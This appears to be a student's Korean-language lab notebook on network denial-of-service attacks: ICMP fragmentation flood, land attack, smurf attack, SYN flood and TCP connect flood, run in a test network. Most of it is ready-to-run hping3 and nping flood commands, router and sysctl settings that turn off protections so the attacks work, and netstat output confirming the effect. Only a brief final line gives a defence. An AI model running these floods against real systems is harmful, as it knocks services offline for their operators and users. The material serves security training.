DOS

Dos
- MTU를 초과하는 데이터사이즈를 보내 많은 단편화를 일으켜 부하 발생 하도록 함
-d : data size
hping3 --icmp --rand-source 10.10.10.100 -d 65000 

라우터에서 비정상적인 단편화가 탐지가 되면 아래 메시지를 보내고 해당 패킷을 Drop한다.
%IP_VFR-4-TOO_MANY_FRAGMENTS: FastEthernet0/1:
공격이 가능하게 하려면 해당 라우터 인터페이스에 아래 명령어를 실행시키면 된다.
R4(config-if)#no ip virtual-reassembly

land attack
- IP 주소로 공격
hping3 --icmp -a 192.168.0.100 34.0.0.100
> 위 주소는 static nat가 걸려있어서 IP주소가 다르지만 원래는 같은 IP주소를 넣는다.

- 포트번호로 공격
> -s : 출발지 포트 , -p : 목적지 포트 , -k : 포트번호가 증가안되고 유지됨
hping3 -a 192.168.0.100 34.0.0.100 -s 80 -k -p 80 -S 

Smurf Attack
- 공격이 먹히도록 설정변경
- 모든 서버에 아래 명령어 입력
sysctl net.ipv4.icmp_echo_ignore_broadcast=0 ( 보안설정은 1)

- 서버와 연결 되어 있는 라우터에 아래 명령어 입력
(인터페이스 양쪽 다 설정)
int fa 0/0, 0/1 
ip directed-broadcast (보안설정은 no ip directed-broadcast로 돌려놓음)

hping3 -a 20.20.20.20 192.168.0.255 --icmp
> 공격한번 보내면 4개의 응답이 보내짐(서버 수만큼 공격)


TCP SYN Flooding

FTP Server
- syncookies=0 으로 비활성화 backlog=5으로 제한 설정하기
(syncookies 란 연결 수립중인 세션은 카운트 X --> 3way가 완료된것만 카운드O)
[root@localhost dhcp]# sysctl net.ipv4.tcp_syncookies=0
net.ipv4.tcp_syncookies = 0
[root@localhost dhcp]# sysctl -a | grep "backlog"
net.core.netdev_max_backlog = 1000
net.ipv4.tcp_max_syn_backlog = 128
[root@localhost dhcp]# sysctl net.ipv4.tcp_max_syn_backlog=5
net.ipv4.tcp_max_syn_backlog = 5
[root@localhost dhcp]# 

vim /etc/vsftpd/vsftpd.conf 에서 최대 연결수 5로 하고 (max_clients=5)
공격자 pc(칼리)에서 
hping3 --rand-source 192.168.0.150 -p 21 -S --flood (flood를 붙이면 빠르고 많이 보내짐)

아래 처럼 전부 연결상태로 변함
[root@localhost dhcp]# netstat -antup | grep ":21"
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      5025/vsftpd         
tcp        0      0 192.168.0.150:21            252.163.188.113:2402        SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            30.115.73.162:2401          SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            125.15.48.12:2406           SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            2.126.39.28:2405            SYN_RECV    -                   
tcp        0      0 192.168.0.150:21            17.85.133.57:2404           SYN_RECV    -                  

TCP Connect Flood
- 3-way과정을 과도하게 유발시켜 과부하 발생
> -c : 몇번 반복할 건지
nping --tcp-connect -p 21 -c 100000 192.168.0.150

[root@localhost dhcp]# netstat -antup | grep ":21"
tcp        0      0 0.0.0.0:21                  0.0.0.0:*                   LISTEN      5025/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:46119           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:46291           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:38961           ESTABLISHED 5336/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:44991           ESTABLISHED 5338/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:33855           ESTABLISHED 5330/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:34625           FIN_WAIT2   -                   
tcp        0      0 192.168.0.150:21            10.10.10.20:35489           ESTABLISHED 5334/vsftpd         
tcp        0      0 192.168.0.150:21            10.10.10.20:43211           ESTABLISHED 5332/vsftpd   

방어하기

[root@localhost dhcp]# vim /etc/vsftpd/vsftpd.conf 
에서 마지막줄에 max_per_ip=2 입력 하면
공격자 pc에서 공격해도 사용자 pc에서 접속 가능